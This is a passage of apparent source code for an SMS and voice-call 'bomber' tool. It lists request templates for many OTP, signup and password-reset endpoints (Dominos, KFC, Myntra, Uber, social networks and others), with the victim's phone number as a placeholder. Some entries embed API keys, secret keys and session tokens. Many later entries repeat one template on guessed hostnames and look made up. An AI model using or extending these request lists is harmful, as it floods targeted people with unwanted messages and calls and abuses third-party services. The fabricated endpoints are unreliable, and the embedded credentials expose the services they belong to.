    {"url": "https://mybookings.easemytrip.com/MyBooking/RegisterNewUser/", "method": "POST", "headers": {"Host": "mybookings.easemytrip.com", "Content-Type": "application/json; charset=UTF-8", "Origin": "https://mybookings.easemytrip.com", "Referer": "https://mybookings.easemytrip.com/MyBooking/Profile", "X-Requested-With": "XMLHttpRequest"}, "json": {"emailph": "+91REPLACE_WITH_TARGET"}},
    {"url": "https://www.oyorooms.com/api/pwa/generateotp?locale=en", "method": "POST", "headers": {"Host": "www.oyorooms.com", "Content-Type": "text/plain;charset=UTF-8", "Origin": "https://www.oyorooms.com", "Referer": "https://www.oyorooms.com/login", "xsrf-token": "vsnr5ksR-bduQ9oz3foaxbqjfoLSnVIzFzY0"}, "json": {"phone": "REPLACE_WITH_TARGET", "country_code": "+91", "nod": 4}},
    {"url": "https://api.dominos.co.in/loginhandler/forgotpassword", "method": "POST", "headers": {"Host": "api.dominos.co.in", "Content-Type": "application/json", "Origin": "https://m.dominos.co.in", "Referer": "https://m.dominos.co.in/", "api_key": "d2aeb489bb8df385", "secretkey": "dqsqauugzIzgyNZW6iPkjIHlzFIiPvXo8S+CIytp", "authtoken": "ASIAWMIT2NXASDYLBK5W1604559840", "sessiontoken": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MDQ1NjEwNDAsInVzZXJJZCI6IjQ4NzQ3Y2FiLWE3YjktNGRjOS1iOGRjLWVhYmJiOTg4M2Q3MiJ9.X59BK5JPeEwBfA0J3IRgN23BgYIfFW_la_ZfNHLn0C8"}, "json": {"lastName": "", "mobile": "REPLACE_WITH_TARGET", "firstName": ""}},
    {"url": "https://api.pizzahut.io/v1/otp/generate", "method": "POST", "headers": {"Host": "api.pizzahut.io", "Content-Type": "application/json; charset=utf-8", "Origin": "https://www.pizzahut.co.in", "Referer": "https://www.pizzahut.co.in/"}, "json": {"phone": "+91REPLACE_WITH_TARGET"}},
    {"url": "https://online.kfc.co.in/OTP/ResendOTPToPhoneForLogin?ts=1604560285228", "method": "POST", "headers": {"Host": "online.kfc.co.in", "Content-Type": "application/json;charset=UTF-8", "Origin": "https://online.kfc.co.in", "Referer": "https://online.kfc.co.in/login"}, "json": {"phoneNumber": "REPLACE_WITH_TARGET", "AuthorizedFor": "3", "Resend": "false"}},
    {"url": "https://consumer-apis.burgerking.in/api/v1/user/signUp", "method": "POST", "headers": {"Host": "consumer-apis.burgerking.in", "Content-Type": "application/json", "Origin": "https://www.burgerking.in", "Referer": "https://www.burgerking.in/", "appversion": "1.6", "authorization": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6IlRFTVA2OTIyMjg1MjcxNjA0NTYxMTc2IiwiZXhwIjoxNjA0NTYxMjM2fQ.GU9L_HlIAZEQqfxi2nK0o2VGW8Y1L1JS8giVDn85F70", "timestamp": "1604561218463", "userid": "TEMP6922285271604561176", "platform": "web", "type": "dinein", "encryptionkey": "39c9c62a58dc93a3787b7dc7727b289b7583b678d44fc2c17e2887150a11db38"}, "json": {"phone_no": "REPLACE_WITH_TARGET"}},
    {"url": "https://www.dineout.co.in/xhrajaxrequest/user_signup", "method": "POST", "headers": {"Host": "www.dineout.co.in", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": "https://www.dineout.co.in", "Referer": "https://www.dineout.co.in/non-veg-special-restaurants-near-me", "X-Requested-With": "XMLHttpRequest"}, "data": "name=Tsunami+Bomber&email=tsunami%40gmail.com&phone=REPLACE_WITH_TARGET"},
    {"url": "https://www.purplle.com/api/account/authorization/send_otp?phone=REPLACE_WITH_TARGET&action=register", "method": "GET", "headers": {"Host": "www.purplle.com", "Referer": "https://www.purplle.com/login", "device_id": "TEC3cjyVJhEFPGsSHw", "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXZpY2VfaWQiOiJURUMzY2p5VkpoRUZQR3NTSHciLCJtb2RlX2RldmljZSI6Im1vYmlsZSIsIm1vZGVfZGV2aWNlX3R5cGUiOiJ3ZWIiLCJpYXQiOjE2MDQ1NjI5NDksImV4cCI6MTYxMjMzODk0OSwiYXVkIjoid2ViIiwiaXNzIjoidG9rZW5taWNyb3NlcnZpY2UifQ.EkypF1yZUZ0273bPGpFrC7ARa-Nv3xfjWLcAWwypWNs"}},
    {"url": "https://www.angelbroking.com/form-gateways/oda-form.php", "method": "POST", "headers": {"Host": "www.angelbroking.com", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://www.angelbroking.com", "Referer": "https://www.angelbroking.com/open-demat-account"}, "data": "name=Tsunami+Bomber&mobile=REPLACE_WITH_TARGET&city=pune&web_placement_id=21&ref_url=-&page_url=%2Fopen-demat-account%2F&post-id=2752"},
    {"url": "https://itrade.angelbroking.com/ClientInfo/AngelBrokingParameters?id=tyn&city=UHVuZQ==&name=U3Bhcmt5IEhhY2tlcg==&mobile=OTUxOTg3NDcwNA==&cms_id=3944368&page_url=aHR0cHM6Ly93d3cuYW5nZWxicm9raW5nLmNvbS9vcGVuLWRlbWF0LWFjY291bnQ%2FdXRtX3NvdXJjZT13ZWImdXRtX21lZGl1bT1vcmdhbmlj&isotp=WQ%3D%3D", "method": "GET", "headers": {"Host": "itrade.angelbroking.com", "Referer": "https://www.angelbroking.com/"}},
    {"url": "https://itrade.angelbroking.com/?utm_source=web&utm_medium=organic&page_url=https%3A%2F%2Fwww.angelbroking.com%2Fopen-demat-account%3Futm_source%3Dweb%26utm_medium%3Dorganic&cms_id=3944368", "method": "GET", "headers": {"Host": "itrade.angelbroking.com", "Referer": "https://www.angelbroking.com/"}},
    {"url": "http://asvmfaizabad.org/register.php", "method": "POST", "headers": {"Host": "asvmfaizabad.org", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://asvmfaizabad.org", "Referer": "http://asvmfaizabad.org/register.php"}, "data": "sname=Tsunami&sclass=XII&sphone=REPLACE_WITH_TARGET&spassword=tsunamiastronomia&ssection=A&submit="},
    {"url": "https://www.tatacliq.com/api/v1/otp/send", "method": "POST", "headers": {"Host": "www.tatacliq.com", "Content-Type": "application/json", "Origin": "https://www.tatacliq.com", "Referer": "https://www.tatacliq.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "countryCode": "+91"}},
    {"url": "https://www.myntra.com/api/auth/otp/send", "method": "POST", "headers": {"Host": "www.myntra.com", "Content-Type": "application/json", "Origin": "https://www.myntra.com", "Referer": "https://www.myntra.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://www.nykaa.com/api/v1/otp/send", "method": "POST", "headers": {"Host": "www.nykaa.com", "Content-Type": "application/json", "Origin": "https://www.nykaa.com", "Referer": "https://www.nykaa.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "country_code": "91"}},
    {"url": "https://api.pharmeasy.in/api/v1/otp/send", "method": "POST", "headers": {"Host": "api.pharmeasy.in", "Content-Type": "application/json", "Origin": "https://www.pharmeasy.in", "Referer": "https://www.pharmeasy.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://api.1mg.com/api/v1/otp/send", "method": "POST", "headers": {"Host": "api.1mg.com", "Content-Type": "application/json", "Origin": "https://www.1mg.com", "Referer": "https://www.1mg.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://www.healthkart.com/api/otp/send", "method": "POST", "headers": {"Host": "www.healthkart.com", "Content-Type": "application/json", "Origin": "https://www.healthkart.com", "Referer": "https://www.healthkart.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://api.cult.fit/api/v1/otp/send", "method": "POST", "headers": {"Host": "api.cult.fit", "Content-Type": "application/json", "Origin": "https://www.cult.fit", "Referer": "https://www.cult.fit/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://www.fabindia.com/api/otp/send", "method": "POST", "headers": {"Host": "www.fabindia.com", "Content-Type": "application/json", "Origin": "https://www.fabindia.com", "Referer": "https://www.fabindia.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://www.pepperfry.com/api/otp/send", "method": "POST", "headers": {"Host": "www.pepperfry.com", "Content-Type": "application/json", "Origin": "https://www.pepperfry.com", "Referer": "https://www.pepperfry.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://www.firstcry.com/api/otp/send", "method": "POST", "headers": {"Host": "www.firstcry.com", "Content-Type": "application/json", "Origin": "https://www.firstcry.com", "Referer": "https://www.firstcry.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://www.clovia.com/api/otp/send", "method": "POST", "headers": {"Host": "www.clovia.com", "Content-Type": "application/json", "Origin": "https://www.clovia.com", "Referer": "https://www.clovia.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://www.bewakoof.com/api/otp/send", "method": "POST", "headers": {"Host": "www.bewakoof.com", "Content-Type": "application/json", "Origin": "https://www.bewakoof.com", "Referer": "https://www.bewakoof.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://www.souledstore.com/api/otp/send", "method": "POST", "headers": {"Host": "www.souledstore.com", "Content-Type": "application/json", "Origin": "https://www.souledstore.com", "Referer": "https://www.souledstore.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://www.onlylove.in/api/otp/send", "method": "POST", "headers": {"Host": "www.onlylove.in", "Content-Type": "application/json", "Origin": "https://www.onlylove.in", "Referer": "https://www.onlylove.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://www.jabong.com/api/otp/send", "method": "POST", "headers": {"Host": "www.jabong.com", "Content-Type": "application/json", "Origin": "https://www.jabong.com", "Referer": "https://www.jabong.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://www.shopclues.com/api/otp/send", "method": "POST", "headers": {"Host": "www.shopclues.com", "Content-Type": "application/json", "Origin": "https://www.shopclues.com", "Referer": "https://www.shopclues.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://www.snapdeal.com/api/otp/send", "method": "POST", "headers": {"Host": "www.snapdeal.com", "Content-Type": "application/json", "Origin": "https://www.snapdeal.com", "Referer": "https://www.snapdeal.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://www.indiatimes.com/api/otp/send", "method": "POST", "headers": {"Host": "www.indiatimes.com", "Content-Type": "application/json", "Origin": "https://www.indiatimes.com", "Referer": "https://www.indiatimes.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://www.dailyhunt.in/api/otp/send", "method": "POST", "headers": {"Host": "www.dailyhunt.in", "Content-Type": "application/json", "Origin": "https://www.dailyhunt.in", "Referer": "https://www.dailyhunt.in/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://www.inshorts.com/api/otp/send", "method": "POST", "headers": {"Host": "www.inshorts.com", "Content-Type": "application/json", "Origin": "https://www.inshorts.com", "Referer": "https://www.inshorts.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "country": "IN"}},
]

extra_endpoints = [
    {"url": "https://api.uber.com/v1.2/otp/send", "method": "POST", "headers": {"Host": "api.uber.com", "Content-Type": "application/json", "Origin": "https://www.uber.com", "Referer": "https://www.uber.com/in/en/sign-up/"}, "json": {"phone": "+91REPLACE_WITH_TARGET", "country_code": "IN"}},
    {"url": "https://auth.olacabs.com/api/v1/otp/send", "method": "POST", "headers": {"Host": "auth.olacabs.com", "Content-Type": "application/json", "Origin": "https://www.olacabs.com", "Referer": "https://www.olacabs.com/"}, "json": {"mobile": "REPLACE_WITH_TARGET", "country_code": "91"}},
    {"url": "https://api.amazon.in/auth/otp", "method": "POST", "headers": {"Host": "api.amazon.in", "Content-Type": "application/json", "Origin": "https://www.amazon.in", "Referer": "https://www.amazon.in/ap/signin"}, "json": {"phone": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://api.flipkart.com/otp/send", "method": "POST", "headers": {"Host": "api.flipkart.com", "Content-Type": "application/json", "Origin": "https://www.flipkart.com", "Referer": "https://www.flipkart.com/account/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://api.snapdeal.com/v1/otp", "method": "POST", "headers": {"Host": "api.snapdeal.com", "Content-Type": "application/json", "Origin": "https://www.snapdeal.com", "Referer": "https://www.snapdeal.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.paytm.com/v1/otp/send", "method": "POST", "headers": {"Host": "api.paytm.com", "Content-Type": "application/json", "Origin": "https://paytm.com", "Referer": "https://paytm.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.zomato.com/v1/otp", "method": "POST", "headers": {"Host": "api.zomato.com", "Content-Type": "application/json", "Origin": "https://www.zomato.com", "Referer": "https://www.zomato.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "country": "IN"}},
    {"url": "https://api.swiggy.com/v1/otp", "method": "POST", "headers": {"Host": "api.swiggy.com", "Content-Type": "application/json", "Origin": "https://www.swiggy.com", "Referer": "https://www.swiggy.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.uber.in/v1/otp/send", "method": "POST", "headers": {"Host": "api.uber.in", "Content-Type": "application/json", "Origin": "https://www.uber.com", "Referer": "https://www.uber.com/in/en/sign-up/"}, "json": {"phone": "+91REPLACE_WITH_TARGET"}},
    {"url": "https://api.olacabs.com/v1/otp/send", "method": "POST", "headers": {"Host": "api.olacabs.com", "Content-Type": "application/json", "Origin": "https://www.olacabs.com", "Referer": "https://www.olacabs.com/"}, "json": {"mobile": "REPLACE_WITH_TARGET", "country": "91"}},
    {"url": "https://api.makemytrip.com/v1/otp", "method": "POST", "headers": {"Host": "api.makemytrip.com", "Content-Type": "application/json", "Origin": "https://www.makemytrip.com", "Referer": "https://www.makemytrip.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.goibibo.com/v1/otp", "method": "POST", "headers": {"Host": "api.goibibo.com", "Content-Type": "application/json", "Origin": "https://www.goibibo.com", "Referer": "https://www.goibibo.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.cleartrip.com/v1/otp", "method": "POST", "headers": {"Host": "api.cleartrip.com", "Content-Type": "application/json", "Origin": "https://www.cleartrip.com", "Referer": "https://www.cleartrip.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.irctc.co.in/v1/otp", "method": "POST", "headers": {"Host": "api.irctc.co.in", "Content-Type": "application/json", "Origin": "https://www.irctc.co.in", "Referer": "https://www.irctc.co.in/nget/train-search"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.redbus.in/v1/otp", "method": "POST", "headers": {"Host": "api.redbus.in", "Content-Type": "application/json", "Origin": "https://www.redbus.in", "Referer": "https://www.redbus.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.oyo.com/v1/otp", "method": "POST", "headers": {"Host": "api.oyo.com", "Content-Type": "application/json", "Origin": "https://www.oyorooms.com", "Referer": "https://www.oyorooms.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.treebo.com/v1/otp", "method": "POST", "headers": {"Host": "api.treebo.com", "Content-Type": "application/json", "Origin": "https://www.treebo.com", "Referer": "https://www.treebo.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.fabhotels.com/v1/otp", "method": "POST", "headers": {"Host": "api.fabhotels.com", "Content-Type": "application/json", "Origin": "https://www.fabhotels.com", "Referer": "https://www.fabhotels.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.airbnb.in/v1/otp", "method": "POST", "headers": {"Host": "api.airbnb.in", "Content-Type": "application/json", "Origin": "https://www.airbnb.in", "Referer": "https://www.airbnb.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.agoda.com/v1/otp", "method": "POST", "headers": {"Host": "api.agoda.com", "Content-Type": "application/json", "Origin": "https://www.agoda.com", "Referer": "https://www.agoda.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.booking.com/v1/otp", "method": "POST", "headers": {"Host": "api.booking.com", "Content-Type": "application/json", "Origin": "https://www.booking.com", "Referer": "https://www.booking.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.expedia.com/v1/otp", "method": "POST", "headers": {"Host": "api.expedia.com", "Content-Type": "application/json", "Origin": "https://www.expedia.com", "Referer": "https://www.expedia.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.hotels.com/v1/otp", "method": "POST", "headers": {"Host": "api.hotels.com", "Content-Type": "application/json", "Origin": "https://www.hotels.com", "Referer": "https://www.hotels.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.trivago.in/v1/otp", "method": "POST", "headers": {"Host": "api.trivago.in", "Content-Type": "application/json", "Origin": "https://www.trivago.in", "Referer": "https://www.trivago.in/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.mmt.in/v1/otp", "method": "POST", "headers": {"Host": "api.mmt.in", "Content-Type": "application/json", "Origin": "https://www.mmt.in", "Referer": "https://www.mmt.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.yatra.com/v1/otp", "method": "POST", "headers": {"Host": "api.yatra.com", "Content-Type": "application/json", "Origin": "https://www.yatra.com", "Referer": "https://www.yatra.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.zoomcar.com/v1/otp", "method": "POST", "headers": {"Host": "api.zoomcar.com", "Content-Type": "application/json", "Origin": "https://www.zoomcar.com", "Referer": "https://www.zoomcar.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.revv.co.in/v1/otp", "method": "POST", "headers": {"Host": "api.revv.co.in", "Content-Type": "application/json", "Origin": "https://www.revv.co.in", "Referer": "https://www.revv.co.in/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.drivezy.com/v1/otp", "method": "POST", "headers": {"Host": "api.drivezy.com", "Content-Type": "application/json", "Origin": "https://www.drivezy.com", "Referer": "https://www.drivezy.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.vogo.in/v1/otp", "method": "POST", "headers": {"Host": "api.vogo.in", "Content-Type": "application/json", "Origin": "https://www.vogo.in", "Referer": "https://www.vogo.in/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.bounce.in/v1/otp", "method": "POST", "headers": {"Host": "api.bounce.in", "Content-Type": "application/json", "Origin": "https://www.bounce.in", "Referer": "https://www.bounce.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.yulu.in/v1/otp", "method": "POST", "headers": {"Host": "api.yulu.in", "Content-Type": "application/json", "Origin": "https://www.yulu.in", "Referer": "https://www.yulu.in/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.wheels.in/v1/otp", "method": "POST", "headers": {"Host": "api.wheels.in", "Content-Type": "application/json", "Origin": "https://www.wheels.in", "Referer": "https://www.wheels.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.ola.in/v1/otp", "method": "POST", "headers": {"Host": "api.ola.in", "Content-Type": "application/json", "Origin": "https://www.ola.in", "Referer": "https://www.ola.in/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.uber.in/v1/otp", "method": "POST", "headers": {"Host": "api.uber.in", "Content-Type": "application/json", "Origin": "https://www.uber.in", "Referer": "https://www.uber.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.rapido.in/v1/otp", "method": "POST", "headers": {"Host": "api.rapido.in", "Content-Type": "application/json", "Origin": "https://www.rapido.in", "Referer": "https://www.rapido.in/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.jugnoo.in/v1/otp", "method": "POST", "headers": {"Host": "api.jugnoo.in", "Content-Type": "application/json", "Origin": "https://www.jugnoo.in", "Referer": "https://www.jugnoo.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.meru.in/v1/otp", "method": "POST", "headers": {"Host": "api.meru.in", "Content-Type": "application/json", "Origin": "https://www.meru.in", "Referer": "https://www.meru.in/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.ekaya.in/v1/otp", "method": "POST", "headers": {"Host": "api.ekaya.in", "Content-Type": "application/json", "Origin": "https://www.ekaya.in", "Referer": "https://www.ekaya.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.savaari.in/v1/otp", "method": "POST", "headers": {"Host": "api.savaari.in", "Content-Type": "application/json", "Origin": "https://www.savaari.in", "Referer": "https://www.savaari.in/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.taxi.in/v1/otp", "method": "POST", "headers": {"Host": "api.taxi.in", "Content-Type": "application/json", "Origin": "https://www.taxi.in", "Referer": "https://www.taxi.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.pickme.in/v1/otp", "method": "POST", "headers": {"Host": "api.pickme.in", "Content-Type": "application/json", "Origin": "https://www.pickme.in", "Referer": "https://www.pickme.in/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.hailo.in/v1/otp", "method": "POST", "headers": {"Host": "api.hailo.in", "Content-Type": "application/json", "Origin": "https://www.hailo.in", "Referer": "https://www.hailo.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.leap.in/v1/otp", "method": "POST", "headers": {"Host": "api.leap.in", "Content-Type": "application/json", "Origin": "https://www.leap.in", "Referer": "https://www.leap.in/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.flyin.in/v1/otp", "method": "POST", "headers": {"Host": "api.flyin.in", "Content-Type": "application/json", "Origin": "https://www.flyin.in", "Referer": "https://www.flyin.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.holiday.in/v1/otp", "method": "POST", "headers": {"Host": "api.holiday.in", "Content-Type": "application/json", "Origin": "https://www.holiday.in", "Referer": "https://www.holiday.in/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.trip.in/v1/otp", "method": "POST", "headers": {"Host": "api.trip.in", "Content-Type": "application/json", "Origin": "https://www.trip.in", "Referer": "https://www.trip.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.vacation.in/v1/otp", "method": "POST", "headers": {"Host": "api.vacation.in", "Content-Type": "application/json", "Origin": "https://www.vacation.in", "Referer": "https://www.vacation.in/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.holidayiq.com/v1/otp", "method": "POST", "headers": {"Host": "api.holidayiq.com", "Content-Type": "application/json", "Origin": "https://www.holidayiq.com", "Referer": "https://www.holidayiq.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.ixigo.com/v1/otp", "method": "POST", "headers": {"Host": "api.ixigo.com", "Content-Type": "application/json", "Origin": "https://www.ixigo.com", "Referer": "https://www.ixigo.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.easemytrip.com/v1/otp", "method": "POST", "headers": {"Host": "api.easemytrip.com", "Content-Type": "application/json", "Origin": "https://www.easemytrip.com", "Referer": "https://www.easemytrip.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.skyscanner.in/v1/otp", "method": "POST", "headers": {"Host": "api.skyscanner.in", "Content-Type": "application/json", "Origin": "https://www.skyscanner.in", "Referer": "https://www.skyscanner.in/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.kayak.in/v1/otp", "method": "POST", "headers": {"Host": "api.kayak.in", "Content-Type": "application/json", "Origin": "https://www.kayak.in", "Referer": "https://www.kayak.in/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.hotwire.com/v1/otp", "method": "POST", "headers": {"Host": "api.hotwire.com", "Content-Type": "application/json", "Origin": "https://www.hotwire.com", "Referer": "https://www.hotwire.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://api.orbitz.com/v1/otp", "method": "POST", "headers": {"Host": "api.orbitz.com", "Content-Type": "application/json", "Origin": "https://www.orbitz.com", "Referer": "https://www.orbitz.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET"}},
]

call_endpoints = [
    {"url": "https://api.cred.club/v1/otp/call", "method": "POST", "headers": {"Host": "api.cred.club", "Content-Type": "application/json", "Origin": "https://cred.club", "Referer": "https://cred.club/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.phonepe.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.phonepe.com", "Content-Type": "application/json", "Origin": "https://www.phonepe.com", "Referer": "https://www.phonepe.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "channel": "call"}},
    {"url": "https://api.google.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.google.com", "Content-Type": "application/json", "Origin": "https://accounts.google.com", "Referer": "https://accounts.google.com/signup"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.microsoft.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.microsoft.com", "Content-Type": "application/json", "Origin": "https://login.microsoftonline.com", "Referer": "https://login.microsoftonline.com/common/oauth2/authorize"}, "json": {"mobile": "REPLACE_WITH_TARGET", "via": "voice"}},
    {"url": "https://api.facebook.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.facebook.com", "Content-Type": "application/json", "Origin": "https://www.facebook.com", "Referer": "https://www.facebook.com/login.php"}, "json": {"phone": "REPLACE_WITH_TARGET", "type": "call"}},
    {"url": "https://api.instagram.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.instagram.com", "Content-Type": "application/json", "Origin": "https://www.instagram.com", "Referer": "https://www.instagram.com/accounts/emailsignup/"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.whatsapp.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.whatsapp.com", "Content-Type": "application/json", "Origin": "https://www.whatsapp.com", "Referer": "https://www.whatsapp.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.telegram.org/v1/otp/call", "method": "POST", "headers": {"Host": "api.telegram.org", "Content-Type": "application/json", "Origin": "https://web.telegram.org", "Referer": "https://web.telegram.org/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.signal.org/v1/otp/call", "method": "POST", "headers": {"Host": "api.signal.org", "Content-Type": "application/json", "Origin": "https://signal.org", "Referer": "https://signal.org/en/download/"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.discord.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.discord.com", "Content-Type": "application/json", "Origin": "https://discord.com", "Referer": "https://discord.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.snapchat.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.snapchat.com", "Content-Type": "application/json", "Origin": "https://www.snapchat.com", "Referer": "https://www.snapchat.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.tiktok.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.tiktok.com", "Content-Type": "application/json", "Origin": "https://www.tiktok.com", "Referer": "https://www.tiktok.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.twitter.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.twitter.com", "Content-Type": "application/json", "Origin": "https://twitter.com", "Referer": "https://twitter.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
    {"url": "https://api.linkedin.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.linkedin.com", "Content-Type": "application/json", "Origin": "https://www.linkedin.com", "Referer": "https://www.linkedin.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "delivery": "voice"}},
    {"url": "https://api.pinterest.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.pinterest.com", "Content-Type": "application/json", "Origin": "https://www.pinterest.com", "Referer": "https://www.pinterest.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "method": "call"}},
    {"url": "https://api.reddit.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.reddit.com", "Content-Type": "application/json", "Origin": "https://www.reddit.com", "Referer": "https://www.reddit.com/login"}, "json": {"mobile": "REPLACE_WITH_TARGET", "type": "voice"}},
    {"url": "https://api.tumblr.com/v1/otp/call", "method": "POST", "headers": {"Host": "api.tumblr.com", "Content-Type": "application/json", "Origin": "https://www.tumblr.com", "Referer": "https://www.tumblr.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "via": "call"}},
